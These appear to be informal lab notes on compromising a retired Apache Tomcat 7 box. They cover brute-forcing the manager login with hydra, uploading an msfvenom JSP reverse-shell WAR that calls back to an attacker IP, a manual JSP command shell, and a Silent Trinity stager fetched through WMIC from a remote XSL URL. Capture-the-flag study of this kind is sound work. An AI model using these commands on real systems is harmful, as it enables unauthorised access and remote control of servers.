Nmap:

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1

cannot login to tomcat host manager page.

look for tomcat wordlist.

Use hydra

hydra -C lets you use the colon seperated text files.

hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://10.129.161.193:8000/manager/html

admin was false-positive.

got in.

the page allows you to upload a WAR file (contains javascript)

generate a payload through msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.131 LPORT=5555 -f war > shell.war

We are already root!

----

Manual JSP shell - silent trendy - python

Get a JSP shell:

Follow the instruction for host method:

<script src="http://10.10.14.131/a.js"></script>

Additional tip, remove the war file that came with the package and make your own with:

zip cmd.war cmd.jsp

it will attach the war file to the cmd.jsp

Finally, host the file on http.

Go to manager/html page/ and deploy the cmd.war file.

Now when you go to the /cmd/cmd.jsp directory, we get a shell!!!

execute command with syntax cmd /c COMMAND

Silent Trinity:

Downloaded here.

Go to server and start the st.py

do "listners" to set it as listner mode and "list" what we have

"use http" and set the BindIP

and start the listner!

Once you start do stgers > list > use wmic > generate http

Plug this value into our JSP shell.

C:\Windows\System32\wbem\WMIC.exe os get /format:"https://myurl/wmic.xsl"

create a new www directory and move the wmic.xsl there .

Since the tomcat requires a.js file, copy that over to the directory as well.

hmm didn't work. I'll come back to this.